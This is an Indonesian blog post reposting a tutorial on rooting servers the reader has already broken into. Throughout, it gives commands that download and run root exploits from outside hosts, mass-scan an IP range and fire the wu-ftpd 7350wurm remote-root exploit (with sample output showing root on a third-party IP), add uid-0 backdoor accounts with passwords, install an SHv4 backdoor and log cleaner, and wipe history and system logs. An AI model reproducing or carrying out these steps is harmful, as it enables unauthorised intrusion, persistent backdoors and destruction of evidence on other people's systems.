Belajar ngeR00T

Lagi pengen belajar ngR00t eh akhirnya dapet tutorial ini, daripada saya lupa saya rewariter lagi di blogs ini, klo yg punya ga berkenan bisa kirim massage ke saya oK.

<<Belajar NgeRoot>>

### tahap ngeroot di shell yg tadi kita tembus
 mkdir /tmp/temp.log
 cd /tmp/temp.log
 wget http://roseofworld.org/root.tar.gz
 tar -zxvf root.tar.gz
 cd root
 ./loginx 1970 1970
 # jika tidak mendapat pesan error maka kmu sukses, pointer $ akan brubah menjadi #
 # cek dengan `id` jika root jgn lupa bagi2 shellnya :p
 ### atau bisa ambil exploit di www.malanghack.net/alat/
 mkdir /tmp/temp.log;cd /tmp/temp.log
 wget http://www.malanghack.net/alat/w00t
 chmod 755 w00t
 ./w00t
 # jika ga muncul pesan error: you got root man!!
 +—————————————————————————————-+

 <<Cracking Root>>

 Tips:
 mkdir .bash <— untuk membuat direktori bash
 cd .bash <— untuk masuk ke direktori bash
 mkdir  <— untuk membuat direktory baru
 cd  <— untuk masuk ke direktory yg anda mau
 cd / <— untuk keluar dari suatu direktory
 rm -rf  <— untuk menghapus file/direktory
 -*———————————————–*-
 1. Tahap Pertama :
 Cara instalasi Xpost dan ftp

 wget http://cyberborneo.b0x.com/xpost.tgz
 wget http://cyberborneo.b0x.com/ftp.tgz
 tar -zxvf xpost.tgz
 tar -zxvf ftp.tgz

 2. Tahap Kedua
 cd xpost
 cd xwurm/
 ./scan 213.124
 setelah dapat wu-scan.log
 ./masswu wu-scan.log
 Setelah didapat pesan sebagai berikut

 Trying get root 213.124.151.113 …
 SUCCESS, YOU HAVE ROOT IN 213.124.151.113 …
 Logged in log-root …

 Itu berarti anda telah dapat akses root di IP 213.124.151.113

 3. Tahap Ketiga
 Buka new sessiom dari putty ssh anda, login kembali ke shell anda
 masuk ke direktory ftp anda

 cd ftp
 ./awu 213.124.151.113 ( ip nya)

 apabila anda sukses mendapat akses root nya maka akan keluar pesan sbb:

 7350wurm – x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
 team teso (thx bnuts, tomas, synnergy.net !).

 # trying to log into 213.124.151.113 with (ftp/mozilla@) … connected.
 # banner: 220 db-depot01 FTP server (Version wu-2.6.1-16) ready.
 # successfully selected target from banner

 ### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]

 # 1. filling memory gaps
 # 2. sending bigbuf + fakechunk
 building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
 # 3. triggering free(globlist[1])
 #
 # exploitation succeeded. sending real shellcode
 # sending setreuid/chroot/execve shellcode
 # spawning shell
 ###################################################################

 uid=0(root) gid=0(root) groups=50(ftp)
 Linux db-depot01 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown

 whoami

 root <– berarti anda sedang dalam akses root

 4. Tahap Keempat

 Add login akses root anda
 —————————————————————-

 1. Cara I

 (bukan utk redhat 7.2)
 /usr/sbin/useradd rampok -u 0 -d /

 passwd -d rampok
 passwd rampok

 su rampok <<——–untuk super user

 2. Cara II

 kalo mau dapet acces root ketik :

 /usr/sbin/useradd crit -u 0 g- 0 -d /etc/crit
 abis itu ketik lagi
 passwd crit

 wuasu666

 Kemudian Add User untuk login shell anda

 /usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/html
 passwd html
 fuck666 2X

 5. Tahap Kelima

 Pasang backdor ke shell baru anda guna menjaga kemungkinan yg tidak di inginkan

 wget www.utay-doyan.cc/shv4.tar.gz
 tar -zxvf shv4.tar.gz
 cd shv4
 ./setup pass yang dimau port yang dimau

 contoh : –> ./setup wuasu 7000
 cd /

 wget http://cyberborneo.b0x.com/cleaner.tgz
 tar -zxvf cleaner.tgz
 cd cleaner
 ./install

 Jangan lupa untuk menghapus file backdor anda tadi untuk menghapus jejak

 rm -rf cleaner.tgz

 rm -rf shv4.tar.gz

 6. Tahap Keenam

 Hapus jejak ngeroot anda ketik perintah berikut:

 rm -f /.bash_history /root/.bash_history /var/log/messages
 ln -s /devory
 ln -s /dev/null /root/.bash_history
 touch /var/log/messages
 chmod 600 /var/log/messages
 rm -rf /var/log/lastlog
 cat > /var/log/lastlog
 ctrl d

Sumber :
http://computersilmu.wordpress.com/2010/09/13/belajar-ngeroot/

You may also like...